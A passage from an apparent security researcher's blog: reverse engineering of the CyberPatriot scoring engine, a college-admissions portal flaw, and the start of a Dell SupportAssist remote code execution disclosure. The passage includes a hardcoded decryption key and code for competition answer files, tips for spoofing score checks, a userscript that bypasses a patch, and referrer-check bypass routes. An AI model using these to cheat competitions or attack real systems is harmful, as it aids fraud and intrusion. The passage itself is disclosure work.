The Scoring Data needs to be decrypted and parsed into the information class. This happens in a function I call "InitializeScoringData". At first, the function can be quite overwhelming due to its size. It turns out, only the first part does the decryption of the Scoring Data, the rest is just parsing through the XML (the Scoring Data is stored in XML format). The beginning of the "InitializeScoringData" function finds the path to the "ScoringResource.dat" file by referencing the path of the current module ("CCSClient.exe", the scoring engine, is in the same folder as the Scoring Data). For encryption and decryption, the Scoring Engine uses the Crypto++ library (version 5.6.2) and uses AES-GCM. After finding the name of the "ScoringResource.dat" file, the engine initializes the CryptContext for decryption.

Reversing the CyberPatriot National Competition Scoring Engine

The function above initializes the cryptographic context that the engine will later use for decryption. I opted to go with a screenshot to show how the AES Key is displayed in IDA Pro. The AES Key Block starts at Context + 0x4 and is 16 bytes. Following endianness, the key ends up being 0xB, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE, 0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99 starting at the *(_DWORD*)(Context + 4) to the *(_DWORD*)(Context + 0x10).

After initializing the cryptographic context, the Decrypt function will check that the encrypted data file exists and enter a function I call "DecryptData". This function is not only used for decrypting the Scoring Data, but also Scoring Reports.

The "DecryptData" function starts off by reading in the Scoring Data from the "ScoringResource.dat" file using the boost library. It then instantiates a new "CryptoPP::StringSink" and sets the third argument to be the output string. StringSink's are a type of object CryptoPP uses to output to a string. For example, there is also a FileSink if you want to output to a file. The "DecryptData" function then passes on the CryptContext, FileBuffer, FileSize, and the StringSink to a function I call "DecryptBuffer".

The "DecryptBuffer" function first checks that the file is greater than 28 bytes, if it is not, it does not bother decrypting. The function then instantiates a "CryptoPP::BlockCipherFinal" for the AES Class and sets the key and IV. The interesting part is that the IV used for AES Decryption is the first 12 bytes of the file we are trying to decrypt. These bytes are not part of the encrypted content and should be disregarded when decrypting the buffer. If you remember, the key for the AES decryption was specified in the initialize CryptoPP function.

After setting the key and IV used for the AES decryption, the function instantiates a "CryptoPP::ZlibDecompressor". It turns out that the Scoring Data is deflated with Zlib before being encrypted, thus to get the Scoring Data, the data must be inflated again. This Decompressor is attached to the "StreamTransformationFilter" so that after decryption and before the data is put into the OutputString, the data is inflated.

The function starts decrypting by pumping the correct data into different CryptoPP filters. AES-GCM verifies the hash of the file as you decrypt, which is why you'll hear me referring to the "HashVerificationFilter". The "AuthenticatedDecryptionFilter" decrypts and the "StreamTransformationFilter" allows the data to be used in a pipeline.

First, the function inputs the last 16 bytes of the file into the "HashVerificationFilter" and also the IV. Then, it inputs the file contents after the 12th byte into the "AuthenticatedDecryptionFilter" which subsequently pipes it into the "StreamTransformationFilter" which inflates the data on-the-go. If the "HashVerificationFilter" does not throw an error, it returns that the decryption succeeded.
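
Put together, the scheme above can be reproduced with a few lines of Crypto++. This is a minimal sketch, not the engine's actual code: it assumes the whole "ScoringResource.dat" file has been read into file, and mirrors the 12-byte IV / 16-byte trailing tag layout and the hardcoded key described above.

#include <string>
#include <cryptopp/aes.h>
#include <cryptopp/gcm.h>
#include <cryptopp/filters.h>
#include <cryptopp/zlib.h>

std::string DecryptScoringData(const std::string& file)
{
    using namespace CryptoPP;

    // Hardcoded key recovered from the engine (see the IDA screenshot above).
    const byte key[16] = { 0x0B, 0x50, 0x96, 0x92, 0xCA, 0xC8, 0xCA, 0xDE,
                           0xC8, 0xCE, 0xF6, 0x76, 0x95, 0xF5, 0x1E, 0x99 };

    if (file.size() <= 28)  // 12-byte IV + 16-byte GCM tag minimum
        return {};

    GCM<AES>::Decryption aes;
    aes.SetKeyWithIV(key, sizeof(key),
                     reinterpret_cast<const byte*>(file.data()), 12);

    // Decrypt, verify the trailing tag, and inflate the plaintext into XML.
    std::string xml;
    AuthenticatedDecryptionFilter filter(aes,
        new ZlibDecompressor(new StringSink(xml)));
    filter.Put(reinterpret_cast<const byte*>(file.data()) + 12, file.size() - 12);
    filter.MessageEnd();  // throws HashVerificationFailed on a bad tag
    return xml;
}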

The output buffer now contains the XML Scoring Data. Here is the format it takes:

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriotResource>
  <ResourceID></ResourceID>
  <Tier/>
  <Branding>CyberPatriot</Branding>
  <Title></Title>
  <TeamKey></TeamKey>
  <ScoringUrl></ScoringUrl>
  <ScoreboardUrl></ScoreboardUrl>
  <HideScoreboard>true</HideScoreboard>
  <ReadmeUrl/>
  <SupportUrl/>
  <TimeServers>
    <Primary></Primary>
    <Secondary>http://time.is/UTC</Secondary>
    <Secondary>http://nist.time.gov/</Secondary>
    <Secondary>http://www.zulutime.net/</Secondary>
    <Secondary>http://time1.ucla.edu/home.php</Secondary>
    <Secondary>http://viv.ebay.com/ws/eBayISAPI.dll?EbayTime</Secondary>
    <Secondary>http://worldtime.io/current/utc_netherlands/8554</Secondary>
    <Secondary>http://www.timeanddate.com/worldclock/timezone/utc</Secondary>
    <Secondary>http://www.thetimenow.com/utc/coordinated_universal_time</Secondary>
    <Secondary>http://www.worldtimeserver.com/current_time_in_UTC.aspx</Secondary>
  </TimeServers>
  <DestructImage>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <InvalidClient></InvalidClient>
    <InvalidTeam/>
  </DestructImage>
  <DisableFeedback>
    <Before></Before>
    <After></After>
    <Uptime/>
    <Playtime/>
    <NoConnection></NoConnection>
    <InvalidClient></InvalidClient>
    <InvalidTeam></InvalidTeam>
  </DisableFeedback>
  <WarnAfter/>
  <StopImageAfter/>
  <StopTeamAfter/>
  <StartupTime>60</StartupTime>
  <IntervalTime>60</IntervalTime>
  <UploadTimeout>24</UploadTimeout>
  <OnPointsGained>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\gain.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Gained Points!</Execute>
  </OnPointsGained>
  <OnPointsLost>
    <Execute>C:\CyberPatriot\sox.exe C:\CyberPatriot\alarm.wav -d -q</Execute>
    <Execute>C:\CyberPatriot\CyberPatriotNotify.exe You Lost Points.</Execute>
  </OnPointsLost>
  <AutoDisplayPoints>true</AutoDisplayPoints>
  <InstallPath>C:\CyberPatriot</InstallPath>
  <TeamConfig>ScoringConfig</TeamConfig>
  <HtmlReport>ScoringReport</HtmlReport>
  <HtmlReportTemplate>ScoringReportTemplate</HtmlReportTemplate>
  <XmlReport>ScoringData/ScoringReport</XmlReport>
  <RedShirt>tempfile</RedShirt>
  <OnInstall>
    <Execute>cmd.exe /c echo Running installation commands</Execute>
  </OnInstall>
  <ValidClient> <!-- Requirements for VM -->
    <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
    <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
    <ClientHash></ClientHash>
    <ProductID></ProductID>
    <DiskID></DiskID>
    <InstallDate></InstallDate>
  </ValidClient>
  <Check>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Description></Description>
    <Points></Points>
    <Test>
      <Name></Name>
      <Type></Type>
      <<!--TYPE DATA-->></<!--TYPE DATA-->> <!-- Data that is the specified type -->
    </Test>
    <PassIf>
      <<!--TEST NAME-->>
        <Condition></Condition>
        <Equals></Equals>
      </<!--TEST NAME-->>
    </PassIf>
  </Penalty>
  <AllFiles>
    <FilePath></FilePath>
    ...
  </AllFiles>
  <AllQueries>
    <Key></Key>
    ...
  </AllQueries>
</CyberPatriotResource>

The check XML elements tell you exactly what they check for. I don't have the Scoring Data for this year because I did not participate, but here are some XML Scoring Data files for past years:

2016-2017 CP-IX High School Round 2 Windows 8: Here

2016-2017 CP-IX High School Round 2 Windows 2008: Here

2016-2017 CP-IX HS State Platinum Ubuntu 14: Here

2017-2018 CP-X Windows 7 Training Image: Here

Tool to decrypt

This is probably what a lot of you are looking for, just drag and drop an encrypted "ScoringResource.dat" onto the program, and the decrypted version will be printed. If you don't want to compile your own version, there is a compiled binary in the Releases section.

Github Repo: Here

Continuing reversing

After the function decrypts the buffer of Scoring Data, the "InitializeScoringData" parses through it and fills the information class with the data from the XML. The "InitializeScoringData" is only called once at the beginning of the engine and is not called again.

From then on, until the service receives the STOP message, it constantly checks to see if a team patched a vulnerability. In the routine function, the engine checks if the scoring data was initialized/decrypted, and if it wasn't, decrypts again. This is when the second check is done to see whether or not the image should be destructed. The factors it checks includes checking the time, checking the DestructImage object of the XML Scoring Data, etc.

If the function decides to destruct the image, it is quite amusing what it does...

Reversing the CyberPatriot National Competition Scoring Engine

The first if statement checks whether or not to destruct the image, and if it should destruct, it starts:

  • Deleting registry keys and the sub keys under them such as "SOFTWARE\\Microsoft\\Windows NT", "SOFTWARE\\Microsoft\\Windows", ""SOFTWARE\\Microsoft", "SOFTWARE\\Policies", etc.
  • Deleting files in critical system directories such as "C:\\Windows", "C:\\Windows\\System32", etc.
  • Overwriting the first 200 bytes of your first physical drive with NULL bytes.
  • Terminating every process running on your system.

As you can see in the image, it strangely repeats these functions over and over again before exiting. I guess they're quite serious when they say don't try to run the client on your machine.

After checking whether or not to destroy a system, it checks to see if the system is shutting down. If it is not, then it enters a while loop which executes the checks from the Scoring Data XML. It does this in a function I call "ExecuteCheck".

The function "ExecuteCheck" essentially loops every pass condition for a check and executes the check instructions (i.e C:\trojan.exe Exists Equals true). I won't get into the nuances of this function, but this is an important note if you want to spoof that the check passed. The check + 0x54 is a byte which indicates whether or not it passed. Set it to 1 and the engine will consider that check to be successful.

After executing every check, the engine calls a function I call "GenerateScoringXML". This function takes in the data from the checks and generates an XML file that will be sent to the scoring server. It loops each check/penalty and checks the check + 0x54 byte to see if it passed. This XML is also stored in encrypted data files under "C:\CyberPatriot\ScoringData\*.dat". Here is what a scoring XML looks like (you can use my decrypt program on these data files too!):

<?xml version="1.0" encoding="utf-8"?>
<CyberPatriot>
  <ResourceID></ResourceID>
  <TeamID/>
  <Tier/>
  <StartTime></StartTime>
  <VerifiedStartTime></VerifiedStartTime>
  <BestStartTime></BestStartTime>
  <TeamStartTime/>
  <ClientTime></ClientTime>
  <ImageRunningTime></ImageRunningTime>
  <TeamRunningTime></TeamRunningTime>
  <Nonce></Nonce>
  <Seed></Seed>
  <Mac></Mac>
  <Cpu></Cpu>
  <Uptime></Uptime>
  <Sequence>1</Sequence>
  <Tampered>false</Tampered>
  <ResourcePath>C:\CyberPatriot\ScoringResource.dat</ResourcePath>
  <ResourceHash></ResourceHash>
  <ClientPath>C:\CyberPatriot\CCSClient.exe</ClientPath>
  <ClientHash></ClientHash>
  <InstallDate></InstallDate>
  <ProductID></ProductID>
  <DiskID></DiskID>
  <MachineID></MachineID>
  <DPID></DPID>
  <Check>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Check>
  <Penalty>
    <CheckID></CheckID>
    <Passed>0</Passed>
  </Penalty>
  <TotalPoints>0</TotalPoints>
</CyberPatriot>

After generating the Scoring XML, the program calls a function I call "UploadScores". Initially, this function checks internet connectivity by trying to reach Google, the first CyberPatriot scoring server, and the backup CyberPatriot scoring server. The function uploads the scoring XML to the first available scoring server using curl. This function does integrity checks to see if the score XML is incomplete or if there is proxy interception.

After the scoring XML has been uploaded, the engine updates the "ScoringReport.html" to reflect the current status such as internet connectivity, the points scored, the vulnerabilities found, etc.

Finally, the function ends with updating the README shortcut on the Desktop with the appropriate link specified in the decrypted "ScoringResource.dat" XML and calling "DestructImage" again to see if the image should destruct or not. If you're worried about the image destructing, just hook it and return 0.

Conclusion

In conclusion, the CyberPatriot Scoring Engine is really not that complicated. I hope that this article clears up some of the myths and unknowns associated with the engine and gives you a better picture of how it all works. No doubt CyberPatriot will change how they encrypt/decrypt for next year's CyberPatriot, but I am not sure to what extent they will change things.

If you're wondering how I got the "ScoringResource.dat" files from older VM images, there are several methods:

  • VMWare has an option under File called "Map Virtual Disks". You can give it a VMDK file and it will extract it for you into a disc. You can grab it from the filesystem there.
  • 7-Zip can extract VMDK files.
  • If you want to run the VM, you can set your system time to be the time the competition was and turn off networking for the VM. No DestructImage :)

Hacking College Admissions

13 April 2019 at 14:13
Hacking College Admissions

Getting into college is one of the more stressful times of a high school student's life. Since the admissions process can be quite subjective, students have to consider a variety of factors to convince the admissions officers that "they're the one". Some families do as much as they can to improve their chances - even going as far as trying to cheat the system. For wealthier families, this might be donating a very large amount to the school or, as we've heard in the news recently, bribing school officials.

If you don't know about me already, I'm a 17-year-old high school senior with an extreme interest in the information security field who was part of the college admissions process this year. Being part of that process made me interested in investigating: "Can you hack yourself into a school?". In this article, I'll be looking into TargetX, a "Student Lifecycle Solution for Higher Education" that serves several schools. All of this research was done out of my genuine interest in security, not because I wanted to get into a school through malicious means.

Investigation

The school I applied to that was using TargetX was the Worcester Polytechnic Institute in Worcester, Massachusetts. After submitting my application on the Common App, an online portal used to apply to hundreds of schools, I received an email to register on their admissions portal. The URL was the first thing that jumped out at me: https://wpicommunity.force.com/apply. Force.com reminded me of Salesforce, and at first I didn't think Salesforce did college admissions portals. Visiting force.com brought me to their product page for their "Lightning Platform" software. It looked like it was a website building system for businesses. I thought the college might have made their own system, but when I looked at the source of the registration page it referred to something else called TargetX. This is how I found out that TargetX was simply using Salesforce's "Lightning Platform" to create a college admissions portal.

After registering, I started to analyze what was being accessed. At the same time, I was considering that this was a Salesforce Lightning Platform. First, I found their REST API hinged on a route called "apexremote", which turned out to be Salesforce's way of exposing classes to clients through REST. Here is the documentation for that. Fortunately, WPI had configured it correctly so that you could only access APIs that you were supposed to access, and it was pretty locked down. I thought about other APIs Salesforce might expose and found out they had a separate REST/SOAP API too. In WPI's case, they did a good job restricting this API from student users, but in general this is a great attack vector (I found this API exposed on a different Salesforce site).

After digging through several javascript files and learning more about the platform, I found out that Salesforce had a user interface backend system. I decided to try to access it and so I tried a random URL: /apply/_ui/search/ui/aaaaa. This resulted in a page that looked like this:

Hacking College Admissions

It looked like a standard 404 page. What caught my eye was the search bar on the top right. I started playing around with the values and found out it supported basic wildcards. I typed my name and used an asterisk to see if I could find anything.

Hacking College Admissions

Sorry for censoring, but the details included some sensitive information. It seemed as though I could access my own "Application Form" and contact. I was not able to access any other student's application, which was a relief, but it soon turned out that just being able to access my own application was severe enough.

After clicking on my name in the People section, I saw that there was an application record assigned to me. I clicked on it and then it redirected me to a page with a significant amount of information.

Hacking College Admissions

Here's a generalized list of everything I was able to access:

  • General application information
  • Decision information (detailed list of different considered factors)
  • Decision dates
  • Financial Aid information
  • GPA
  • Enrollment information
  • Decision information (misc. options, i.e. whether to show the decision or not)
  • Recommendations (able to view them)
  • SAT / ACT scores
  • High school transcript
  • Personal statement
  • Application fee

Here's where it gets even worse, I can edit everything I just listed above. For example:

Hacking College Admissions

Don't worry, I didn't accept myself into any schools or make my SAT Scores a 1600.

Initial contact

After finding this vulnerability, I immediately reached out to WPI's security team the same day to let them know about the vulnerabilities I found. They were very receptive and within a day they applied their first "patch". Whenever I tried accessing the backend panel, I would see my screen flash for a quick second and then a 404 Message popped up.

Hacking College Admissions

The flash had me interested; upon reading the source code of the page, I found all the data still there! I was very confused and diff'd the source code with an older copy I had saved. This is the javascript block that got added:

if (typeof sfdcPage != 'undefined') {
    if (window.stop) {
        window.stop();
    } else {
        document.execCommand("Stop");
    }
    /*lil too much*/
    if (typeof SimpleDialog != 'undefined') {
        var sd = new SimpleDialog("Error" + Dialogs.getNextId(), false);
        sd.setTitle("Error");
        sd.createDialog();
        window.parent.sd = sd;
        sd.setContentInnerHTML("<p align='center'><img src='/img/msg_icons/error32.png' style='margin:0 5px;'/></p><p align='center'>404 Page not found.</p><p align='center'><br /></p>");
        sd.show();
    }
    document.title = "Error 404";
}

This gave me a good chuckle. What they were doing was stopping the page from loading and then replacing the HTML with a 404 error. I could just use NoScript, but I decided to create a simple userscript to disable their tiny "fix".

(function() {
    'use strict';

    if(document.body.innerHTML.includes("404 Page not found.")) {
        window.stop();
        const xhr = new XMLHttpRequest();
        xhr.open('GET', window.location.href);
        xhr.onload = () => {
            var modified_html = xhr.responseText
            .replace(/<script\b[\s\S]*?<\/script>/g, s => {
                if (s.includes("lil too much"))
                    return ""; // Return nothing for the script content
                return s;
            });
            document.open();
            document.write(modified_html);
            document.close();
        };
        xhr.send();
    }
})();

Basically, this userscript re-requests the page, removes any "404" script blocks, and sets the current page to the updated HTML. It worked great and bypassed their fix. As suspected, WPI had only put a band-aid over the issue to stop any immediate attacks. What I later learned when looking at some other schools was that TargetX themselves added the script under the name "TXPageStopper" - this wasn't just WPI's fix.

It's important to note that if you tried this today, sure, the 404 page would be removed, but nothing would be accessible. The page stopper has been in place since January; after shipping a real patch that fixed the actual issue, they just never removed it.

Remediation?

This is going to be a small section about my interactions with WPI after sending them the vulnerability details. I first found and reported this vulnerability back in January, specifically the third. WPI was very responsive (often replying within hours). I contacted them again on February 14th asking how the vulnerability patch was going and whether this was a vulnerability in only WPI or in TargetX too. Again within an hour, WPI responded saying that they had fixed the issues and that they had a "final meeting set up for the incident review". They said, "It was a combination of a TargetX vulnerability as well as tightening up some of our security settings".

I immediately (within 8 minutes) replied to their email asking for the TargetX side of the vulnerability so I could apply for a CVE. This is when things turned sour. Five days passed and there was no reply. I sent a follow-up email to check in. I sent another follow-up the next week and the week after that. Complete radio silence. By March 16th, I decided to send a final email letting them know that I intended to publish about the vulnerability that week, but this time I CC'd the boss of the person I was in contact with.

Within a day, on a Sunday, the boss replied saying that they had not been aware that I was waiting on information. This is specifically what that email said:

We will reach out to TargetX tomorrow and determine and confirm the exact details of what we are able to release to you. I will be in touch in a day or two with additional information once we have talked with TargetX. We would prefer that you not release any blog posts until we can follow-up with TargetX. Thank you.

Of course, if the vulnerability had not been completely patched yet, I did not want to bring any attention to it. I sent back an email thanking them and saying that I looked forward to hearing from them.

A week passed. I sent a follow-up email asking about the status of things. No response. I sent another follow-up the next week, and this time I mentioned that I was again planning to publish. Radio silence.

It has been about a week since I sent that email. Because I have had no response from them, because they said they had patched the vulnerability, and because I could not extract any more data, I decided to publish.

Other schools impacted

I named this post "Hacking College Admissions" because this vulnerability was not just in WPI. Besides WPI confirming this to me themselves, I found similar vulnerabilities in other schools that were using the TargetX platform.

To find other schools impacted, I enumerated the subdomains of force.com and looked for universities. I am sure I missed some schools, but this is a small list of the other schools affected.

Antioch University
Arcadia University
Averett University
Bellevue University
Berklee College of Music
Boston Architectural College
Boston University
Brandman University
Cabrini University
California Baptist University
California School Of The Arts, San Gabriel Valley
Cardinal University
City Year
Clarion University of Pennsylvania
Columbia College
Concordia University, Irvine
Concordia University, Montreal
Concordia University, Oregon
Concordia University, Texas
Delaware County Community College
Dominican University
ESADE Barcelona
Eastern Oregon University
Eastern University
Embry-Riddle Aeronautical University
Fashion Institute of Design & Merchandising
George Mason University
George Washington University
Grove City College
Harvard Kennedy School
Hood College
Hope College
Illinois Institute of Technology
International Technological University
Johnson & Wales University
Keene State College
Laguna College
Lebanon Valley College
Lehigh Carbon Community College
London School of Economics and Political Science
Mary Baldwin University
Master's University
Moravian College
Nazareth College
New York Institute of Technology
Oregon State University
Pepperdine University
Piedmont College
Plymouth State University
Regis College
Saint Mary's University of Minnesota
Simpson University
Skagit Valley College
Summer Discovery
Texas State Technical College
Towson University
USC Palmetto College
University of Akron
University of Arizona, Eller MBA
University of California, Davis
University of California, San Diego
University of California, Santa Barbara
University of Dayton
University of Houston
University of Maine
University of Michigan-Dearborn
University of Nevada, Reno
University of New Hampshire
University of New Haven
University of Texas, Dallas
University of Virginia
University of Washington
University of Alabama, Birmingham
West Virginia University
Western Connecticut University
Western Kentucky University
Western Michigan University
Wisconsin Indianhead Technical College
Worcester Polytechnic Institute
Wright State University

There are some schools that appeared to be running on the same Salesforce platform but on a custom domain, which is probably why I missed some schools.
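For the curious, here's a minimal C# sketch of one way to do this kind of enumeration, using the public crt.sh certificate transparency search; this is an illustrative approach, not necessarily the exact method I used:

using System;
using System.Collections.Generic;
using System.Net.Http;
using System.Text.RegularExpressions;

class ForceComSubdomains
{
    static void Main()
    {
        using (var client = new HttpClient())
        {
            // crt.sh lists every certificate issued for %.force.com
            string json = client
                .GetStringAsync("https://crt.sh/?q=%25.force.com&output=json")
                .Result;

            // Crudely pull the certificate common names out of the JSON response
            var hosts = new SortedSet<string>();
            foreach (Match m in Regex.Matches(json, "\"common_name\":\\s*\"([^\"]+)\""))
                hosts.Add(m.Groups[1].Value);

            foreach (string host in hosts)
                Console.WriteLine(host); // e.g. wpicommunity.force.com
        }
    }
}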

Conclusion

It turns out having lots of money isn't the only way to get into your dream college, and yes, you can "hack yourself into a school". The scary part about my findings was that WPI, at least, had been vulnerable since they implemented the Salesforce system in 2012. Maybe students should be taking a better look at the systems around them, because I can only imagine what would happen if someone found something like this and used it to cheat the system.

I hope you enjoyed the article and feel free to message me if you have any questions.

Remote Code Execution on most Dell computers

30 April 2019 at 12:52

What computer do you use? Who made it? Have you ever thought about what came with your computer? When we think of Remote Code Execution (RCE) vulnerabilities in mass, we might think of vulnerabilities in the operating system, but another attack vector to consider is "What third-party software came with my PC?". In this article, I'll be looking at a Remote Code Execution vulnerability I found in Dell SupportAssist, software meant to "proactively check the health of your system’s hardware and software" and which is "preinstalled on most of all new Dell devices".

Discovery

Back in September, I was in the market for a new laptop because my 7-year-old MacBook Pro just wasn't cutting it anymore. I was looking for an affordable laptop that had the performance I needed, and I decided on Dell's G3 15 laptop. I also decided to upgrade my laptop's 1 terabyte hard drive to an SSD. After upgrading and re-installing Windows, I had to install drivers. This is when things got interesting. After visiting Dell's support site, I was prompted with an interesting option.

[Screenshot: the "Detect PC" option on Dell's support site]

"Detect PC"? How would it be able to detect my PC? Out of curiosity, I clicked on it to see what happened.

[Screenshot: the SupportAssist driver-detection prompt]

A program which automatically installs drivers for me. Although it was a convenient feature, it seemed risky. The agent wasn't installed on my computer because it was a fresh Windows installation, but I decided to install it to investigate further. It was very suspicious that Dell claimed to be able to update my drivers through a website.

Installing it was a painless process, just a click of the install button. In the shadows, the SupportAssist installer created the SupportAssistAgent and Dell Hardware Support services. These services corresponded to .NET binaries, making it easy to reverse engineer what they did. After installing, I went back to the Dell website and decided to check what it could find.

[Screenshot: the "Detect Drivers" page]

I opened the Chrome Web Inspector and the Network tab then pressed the "Detect Drivers" button.

[Screenshot: network requests to port 8884 on 127.0.0.1]

The website made requests to port 8884 on my local computer. Checking that port out in Process Hacker showed that the SupportAssistAgent service had a web server on it. What Dell was doing was exposing a REST API of sorts in their service, which allowed the Dell website to make various requests. The web server replied with a strict Access-Control-Allow-Origin header of https://www.dell.com to prevent other websites from making requests.

On the web browser side, the client was providing a signature to authenticate various commands. These signatures are generated by making a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken which also provides when the signature expires. After pressing download drivers on the web side, this request was of particular interest:

POST http://127.0.0.1:8884/downloadservice/downloadmanualinstall?expires=expiretime&signature=signature
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json
Origin: https://www.dell.com
Referer: https://www.dell.com/support/home/us/en/19/product-support/servicetag/xxxxx/drivers?showresult=true&files=1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36

The body:

[
    {
    "title":"Dell G3 3579 and 3779 System BIOS",
    "category":"BIOS",
    "name":"G3_3579_1.9.0.exe",
    "location":"https://downloads.dell.com/FOLDER05519523M/1/G3_3579_1.9.0.exe?uid=29b17007-bead-4ab2-859e-29b6f1327ea1&fn=G3_3579_1.9.0.exe",
    "isSecure":false,
    "fileUniqueId":"acd94f47-7614-44de-baca-9ab6af08cf66",
    "run":false,
    "restricted":false,
    "fileId":"198393521",
    "fileSize":"13 MB",
    "checkedStatus":false,
    "fileStatus":-99,
    "driverId":"4WW45",
    "path":"",
    "dupInstallReturnCode":"",
    "cssClass":"inactive-step",
    "isReboot":true,
    "DiableInstallNow":true,
    "$$hashKey":"object:175"
    }
]

It seemed like the web client could make direct requests to the SupportAssistAgent service to "download and manually install" a program. I decided to find the web server in the SupportAssistAgent service to investigate what commands could be issued.

On start, Dell SupportAssist starts a web server (System.Net.HttpListener) on port 8884, 8883, 8886, or 8885. The port depends on whichever one is available, starting with 8884. On a request, the ListenerCallback located in HttpListenerServiceFacade calls ClientServiceHandler.ProcessRequest.
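For illustration, here's a minimal sketch of that port-fallback pattern with System.Net.HttpListener; the class and method names are made up, not Dell's actual code:

using System;
using System.Net;

class AgentWebServer
{
    static readonly int[] CandidatePorts = { 8884, 8883, 8886, 8885 };

    static HttpListener StartListener()
    {
        foreach (int port in CandidatePorts)
        {
            var listener = new HttpListener();
            listener.Prefixes.Add("http://127.0.0.1:" + port + "/");
            try
            {
                listener.Start(); // throws if the port is already taken
                return listener;
            }
            catch (HttpListenerException)
            {
                listener.Close(); // port unavailable, try the next candidate
            }
        }
        throw new InvalidOperationException("No service port available");
    }
}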

ClientServiceHandler.ProcessRequest, the base web server function, starts by doing integrity checks, for example making sure the request came from the local machine, among various other checks. Later in this article, we'll get into some of the issues in the integrity checks, but for now most are not important to achieve RCE.

An important integrity check for us is in ClientServiceHandler.ProcessRequest, specifically the point at which the server checks to make sure my referrer is from Dell. ProcessRequest calls the following function to ensure that I am from Dell:

// Token: 0x060000A8 RID: 168 RVA: 0x00004EA0 File Offset: 0x000030A0
public static bool ValidateDomain(Uri request, Uri urlReferrer)
{
	return SecurityHelper.ValidateDomain(urlReferrer.Host.ToLower()) && (request.Host.ToLower().StartsWith("127.0.0.1") || request.Host.ToLower().StartsWith("localhost")) && request.Scheme.ToLower().StartsWith("http") && urlReferrer.Scheme.ToLower().StartsWith("http");
}

// Token: 0x060000A9 RID: 169 RVA: 0x00004F24 File Offset: 0x00003124
public static bool ValidateDomain(string domain)
{
	return domain.EndsWith(".dell.com") || domain.EndsWith(".dell.ca") || domain.EndsWith(".dell.com.mx") || domain.EndsWith(".dell.com.br") || domain.EndsWith(".dell.com.pr") || domain.EndsWith(".dell.com.ar") || domain.EndsWith(".supportassist.com");
}

The issue with the function above is that it really isn't a solid check and gives an attacker a lot to work with. To bypass the Referer/Origin check, we have a few options:

  1. Find a Cross Site Scripting vulnerability in any of Dell’s websites (I should only have to
    find one on the sites designated for SupportAssist)
  2. Find a Subdomain Takeover vulnerability
  3. Make the request from a local program
  4. Generate a random subdomain name and use an external machine to DNS Hijack the victim. Then, when the victim requests [random].dell.com, we respond with our server.

In the end, I decided to go with option 4, and I’ll explain why in a later bit. After verifying the Referer/Origin of the request, ProcessRequest sends the request to corresponding functions for GET, POST, and OPTIONS.

When I was learning more about how Dell SupportAssist works, I intercepted different types of requests from Dell's support site. Luckily, my laptop had some pending updates, and I was able to intercept requests through my browser's console.

At first, the website tries to detect SupportAssist by looping through the aforementioned service ports and connecting to the service method "isalive". What was interesting was that it was passing a "Signature" parameter and an "Expires" parameter. To find out more, I reversed the JavaScript side in the browser. Here's what I found out:

  1. First, the browser makes a request to https://www.dell.com/support/home/us/en/04/drivers/driversbyscan/getdsdtoken and gets the latest “Token”, or the signatures I was talking about earlier. The endpoint also provides the “Expires token”. This solves the signature problem.
  2. Next, the browser makes a request to each service port with a style like this: http://127.0.0.1:[SERVICEPORT]/clientservice/isalive/?expires=[EXPIRES]&signature=[SIGNATURE].
  3. The SupportAssist client then responds when the right service port is reached, with a style like this:
{
	"isAlive": true,
	"clientVersion": "[CLIENT VERSION]",
	"requiredVersion": null,
	"success": true,
	"data": null,
	"localTime": [EPOCH TIME],
	"Exception": {
		"Code": null,
		"Message": null,
		"Type": null
	}
}
  4. Once the browser sees this, it continues with further requests using the now determined service port.

One concerning thing I noticed while looking at the different types of requests I could make was that I could get a very detailed description of every piece of hardware connected to my computer using the "getsysteminfo" route. Even through Cross Site Scripting, I was able to access this data, which is an issue because it could be used to seriously fingerprint a system and find sensitive information.

Here are the methods the agent exposes:

clientservice_getdevicedrivers - Grabs available updates.
diagnosticsservice_executetip - Takes a tip guid and provides it to the PC Doctor service (Dell Hardware Support).
downloadservice_downloadfiles - Downloads a JSON array of files.
clientservice_isalive - Used as a heartbeat and returns basic information about the agent.
clientservice_getservicetag - Grabs the service tag.
localclient_img - Connects to SignalR (Dell Hardware Support).
diagnosticsservice_getsysteminfowithappcrashinfo - Grabs system information with crash dump information.
clientservice_getclientsysteminfo - Grabs information about devices on system and system health information optionally.
diagnosticsservice_startdiagnosisflow - Used to diagnose issues on system.
downloadservice_downloadmanualinstall - Downloads a list of files but does not execute them.
diagnosticsservice_getalertsandnotifications - Gets any alerts and notifications that are pending.
diagnosticsservice_launchtool - Launches a diagnostic tool.
diagnosticsservice_executesoftwarefixes - Runs remediation UI and executes a certain action.
downloadservice_createiso - Download an ISO.
clientservice_checkadminrights - Check if the Agent is privileged.
diagnosticsservice_performinstallation - Update SupportAssist.
diagnosticsservice_rebootsystem - Reboot system.
clientservice_getdevices - Grab system devices.
downloadservice_dlmcommand - Check on the status of or cancel an ongoing download.
diagnosticsservice_getsysteminfo - Call GetSystemInfo on PC Doctor (Dell Hardware Support).
downloadservice_installmanual - Install a file previously downloaded using downloadservice_downloadmanualinstall.
downloadservice_createbootableiso - Download bootable iso.
diagnosticsservice_isalive - Heartbeat check.
downloadservice_downloadandautoinstall - Downloads a list of files and executes them.
clientservice_getscanresults - Gets driver scan results.
downloadservice_restartsystem - Restarts the system.

The one that caught my interest was downloadservice_downloadandautoinstall. This method downloads a file from a specified URL and then runs it. It is run by the browser when the user needs to install certain drivers that must be installed automatically.

